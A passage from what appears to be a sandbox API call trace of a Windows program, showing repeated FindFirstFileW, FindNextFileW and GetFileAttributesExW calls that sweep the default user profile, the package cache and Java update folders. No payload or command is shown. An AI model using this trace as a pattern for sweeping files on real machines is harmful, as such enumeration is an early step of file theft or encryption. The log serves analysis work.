returned 1 [0043.476] FindNextFileW (in: hFindFile=0x288870, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.476] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x288978 [0043.476] FindNextFileW (in: hFindFile=0x288978, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.477] FindNextFileW (in: hFindFile=0x288978, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.477] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x288ae8 [0043.477] FindNextFileW (in: hFindFile=0x288ae8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.477] FindNextFileW (in: hFindFile=0x288ae8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.477] GetFileAttributesExW (in: lpFileName="c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), fInfoLevelId=0x0, lpFileInformation=0x12ce5c | out: lpFileInformation=0x12ce5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fe34600, ftCreationTime.dwHighDateTime=0x1ced53e, ftLastAccessTime.dwLowDateTime=0x1fe34600, ftLastAccessTime.dwHighDateTime=0x1ced53e, ftLastWriteTime.dwLowDateTime=0x1fe34600, ftLastWriteTime.dwHighDateTime=0x1ced53e, nFileSizeHigh=0x0, nFileSizeLow=0x4ea418)) returned 1 [0043.478] FindNextFileW (in: hFindFile=0x288ae8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.478] FindNextFileW (in: hFindFile=0x288ae8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0 [0043.478] FindClose (in: hFindFile=0x288ae8 | out: hFindFile=0x288ae8) returned 1 [0043.478] FindNextFileW (in: hFindFile=0x288978, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0 [0043.478] FindClose (in: hFindFile=0x288978 | out: hFindFile=0x288978) returned 1 [0043.479] FindNextFileW (in: hFindFile=0x288870, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0 [0043.479] FindClose (in: hFindFile=0x288870 | out: hFindFile=0x288870) returned 1 [0043.479] FindNextFileW (in: hFindFile=0x286ef8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.479] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x288870 [0043.480] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x288978 [0043.480] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x288ae8 [0043.481] GetFileAttributesExW (in: lpFileName="c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), fInfoLevelId=0x0, lpFileInformation=0x12ce5c | out: lpFileInformation=0x12ce5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d80ec00, ftCreationTime.dwHighDateTime=0x1ced53e, ftLastAccessTime.dwLowDateTime=0x1d80ec00, ftLastAccessTime.dwHighDateTime=0x1ced53e, ftLastWriteTime.dwLowDateTime=0x1d80ec00, ftLastWriteTime.dwHighDateTime=0x1ced53e, nFileSizeHigh=0x0, nFileSizeLow=0xc89b1)) returned 1 [0043.482] FindClose (in: hFindFile=0x288ae8 | out: hFindFile=0x288ae8) returned 1 [0043.482] FindClose (in: hFindFile=0x288978 | out: hFindFile=0x288978) returned 1 [0043.482] FindClose (in: hFindFile=0x288870 | out: hFindFile=0x288870) returned 1 [0043.482] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x288798 [0043.483] FindClose (in: hFindFile=0x288798 | out: hFindFile=0x288798) returned 1 [0043.483] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x288798 [0043.484] FindClose (in: hFindFile=0x288798 | out: hFindFile=0x288798) returned 1 [0043.484] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x288870 [0043.485] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x288978 [0043.485] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x288ae8 [0043.486] GetFileAttributesExW (in: lpFileName="c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), fInfoLevelId=0x0, lpFileInformation=0x12ce5c | out: lpFileInformation=0x12ce5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8639f00, ftCreationTime.dwHighDateTime=0x1cf3e37, ftLastAccessTime.dwLowDateTime=0xe8639f00, ftLastAccessTime.dwHighDateTime=0x1cf3e37, ftLastWriteTime.dwLowDateTime=0xe8639f00, ftLastWriteTime.dwHighDateTime=0x1cf3e37, nFileSizeHigh=0x0, nFileSizeLow=0x4b4520)) returned 1 [0043.487] FindClose (in: hFindFile=0x288ae8 | out: hFindFile=0x288ae8) returned 1 [0043.487] FindClose (in: hFindFile=0x288978 | out: hFindFile=0x288978) returned 1 [0043.487] FindClose (in: hFindFile=0x288870 | out: hFindFile=0x288870) returned 1 [0043.487] FindClose (in: hFindFile=0x286ef8 | out: hFindFile=0x286ef8) returned 1 [0043.487] FindFirstFileW (in: lpFileName="c:\\users\\all users\\start menu\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.487] FindFirstFileW (in: lpFileName="c:\\users\\all users\\sun\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x288778 [0043.488] FindFirstFileW (in: lpFileName="c:\\users\\all users\\sun\\java\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x287ea8 [0043.496] FindFirstFileW (in: lpFileName="c:\\users\\all users\\sun\\java\\java update\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x287ee8 [0043.497] GetFileAttributesExW (in: lpFileName="c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml" (normalized: "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml"), fInfoLevelId=0x0, lpFileInformation=0x12d3bc | out: lpFileInformation=0x12d3bc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70634730, ftCreationTime.dwHighDateTime=0x1d2da24, ftLastAccessTime.dwLowDateTime=0x70634730, ftLastAccessTime.dwHighDateTime=0x1d2da24, ftLastWriteTime.dwLowDateTime=0x70634730, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0x77)) returned 1 [0043.498] FindClose (in: hFindFile=0x287ee8 | out: hFindFile=0x287ee8) returned 1 [0043.498] FindClose (in: hFindFile=0x287ea8 | out: hFindFile=0x287ea8) returned 1 [0043.498] FindClose (in: hFindFile=0x288778 | out: hFindFile=0x288778) returned 1 [0043.498] FindFirstFileW (in: lpFileName="c:\\users\\all users\\templates\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.498] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.498] FindFirstFileW (in: lpFileName="c:\\users\\default\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x288740 [0043.499] FindFirstFileW (in: lpFileName="c:\\users\\default\\appdata\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x288780 [0043.499] FindFirstFileW (in: lpFileName="c:\\users\\default\\appdata\\roaming\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x287e68 [0043.500] FindFirstFileW (in: lpFileName="c:\\users\\default\\appdata\\roaming\\identities\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x2888a8 [0043.500] FindFirstFileW (in: lpFileName="c:\\users\\default\\appdata\\roaming\\identities\\{74a13782-b361-4204-9daa-0a3d49da4337}\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x2889f8 [0043.509] FindClose (in: hFindFile=0x2889f8 | out: hFindFile=0x2889f8) returned 1 [0043.509] FindClose (in: hFindFile=0x2888a8 | out: hFindFile=0x2888a8) returned 1 [0043.509] FindClose (in: hFindFile=0x287e68 | out: hFindFile=0x287e68) returned 1 [0043.509] FindClose (in: hFindFile=0x288780 | out: hFindFile=0x288780) returned 1 [0043.509] FindFirstFileW (in: lpFileName="c:\\users\\default\\application data\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.510] FindFirstFileW (in: lpFileName="c:\\users\\default\\contacts\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x288780 [0043.510] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x1ff8a75a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e)) returned 1 [0043.511] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27c82b40, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x19c)) returned 1 [0043.511] FindClose (in: hFindFile=0x288780 | out: hFindFile=0x288780) returned 1 [0043.512] FindFirstFileW (in: lpFileName="c:\\users\\default\\cookies\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.512] FindFirstFileW (in: lpFileName="c:\\users\\default\\desktop\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x288780 [0043.512] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\desktop\\desktop.ini" (normalized: "c:\\users\\default\\desktop\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27c82b40, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x11a)) returned 1 [0043.513] FindClose (in: hFindFile=0x288780 | out: hFindFile=0x288780) returned 1 [0043.513] FindFirstFileW (in: lpFileName="c:\\users\\default\\documents\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x288780 [0043.515] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27f56565, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x192)) returned 1 [0043.516] FindFirstFileW (in: lpFileName="c:\\users\\default\\documents\\my music\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0xffffffff [0043.516] FindFirstFileW (in: lpFileName="c:\\users\\default\\documents\\my pictures\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0xffffffff [0043.516] FindFirstFileW (in: lpFileName="c:\\users\\default\\documents\\my videos\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0xffffffff [0043.517] FindClose (in: hFindFile=0x288780 | out: hFindFile=0x288780) returned 1 [0043.517] FindFirstFileW (in: lpFileName="c:\\users\\default\\downloads\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x288780 [0043.517] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27ee4144, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x11a)) returned 1 [0043.518] FindClose (in: hFindFile=0x288780 | out: hFindFile=0x288780) returned 1 [0043.519] FindFirstFileW (in: lpFileName="c:\\users\\default\\favorites\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x288780 [0043.530] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27ccee00, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x192)) returned 1 [0043.531] FindFirstFileW (in: lpFileName="c:\\users\\default\\favorites\\links\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x288a60 [0043.532] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\favorites\\links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x29913374, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x50)) returned 1 [0043.532] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\favorites\\links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x299f7bb6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xe2)) returned 1 [0043.536] FindClose (in: hFindFile=0x288a60 | out: hFindFile=0x288a60) returned 1 [0043.536] FindFirstFileW (in: lpFileName="c:\\users\\default\\favorites\\msn websites\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x2888a8 [0043.567] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\favorites\\msn websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x29130a86, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0043.568] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\favorites\\msn websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x29130a86, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0043.569] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\favorites\\msn websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x29130a86, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0043.569] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\favorites\\msn websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x2910a926, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0043.570] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\favorites\\msn websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x2910a926, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0043.570] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\favorites\\msn websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x2910a926, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0043.571] FindClose (in: hFindFile=0x2888a8 | out: hFindFile=0x2888a8) returned 1 [0043.571] FindClose (in: hFindFile=0x288780 | out: hFindFile=0x288780) returned 1 [0043.571] FindFirstFileW (in: lpFileName="c:\\users\\default\\links\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x288780 [0043.692] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\links\\desktop.ini" (normalized: "c:\\users\\default\\links\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c426d0, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c426d0, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x280f9488, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x244)) returned 1 [0043.699] FindClose (in: hFindFile=0x288780 | out: hFindFile=0x288780) returned 1 [0043.699] FindFirstFileW (in: lpFileName="c:\\users\\default\\local settings\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.699] FindFirstFileW (in: lpFileName="c:\\users\\default\\music\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x288780 [0043.700] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\music\\desktop.ini" (normalized: "c:\\users\\default\\music\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c1c570, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c1c570, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27ccee00, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0043.701] FindClose (in: hFindFile=0x288780 | out: hFindFile=0x288780) returned 1 [0043.701] FindFirstFileW (in: lpFileName="c:\\users\\default\\my documents\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.701] FindFirstFileW (in: lpFileName="c:\\users\\default\\nethood\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.701] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4ef6cd7a, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0xe87815c0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0x7b6f310, ftLastWriteTime.dwHighDateTime=0x1d2da0d, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0043.702] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4c6063a4, ftCreationTime.dwHighDateTime=0x1ca0453, ftLastAccessTime.dwLowDateTime=0x82363a0a, ftLastAccessTime.dwHighDateTime=0x1ca0458, ftLastWriteTime.dwLowDateTime=0x82389c62, ftLastWriteTime.dwHighDateTime=0x1ca0458, nFileSizeHigh=0x0, nFileSizeLow=0x400)) returned 1 [0043.703] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6baa150, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6baa150, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x19e18206, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x14)) returned 1 [0043.704] FindFirstFileW (in: lpFileName="c:\\users\\default\\pictures\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x288780 [0043.705] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\pictures\\desktop.ini" (normalized: "c:\\users\\default\\pictures\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c1c570, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c1c570, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27c5c9df, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0043.706] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0 [0043.706] FindClose (in: hFindFile=0x288780 | out: hFindFile=0x288780) returned 1 [0043.706] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.706] FindFirstFileW (in: lpFileName="c:\\users\\default\\printhood\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.706] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.706] FindFirstFileW (in: lpFileName="c:\\users\\default\\recent\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.706] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.707] FindFirstFileW (in: lpFileName="c:\\users\\default\\saved games\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x288780 [0043.707] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.707] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.707] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\saved games\\desktop.ini" (normalized: "c:\\users\\default\\saved games\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c1c570, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c1c570, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27fa2825, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x11a)) returned 1 [0043.707] FindNextFileW (in: hFindFile=0x288780, 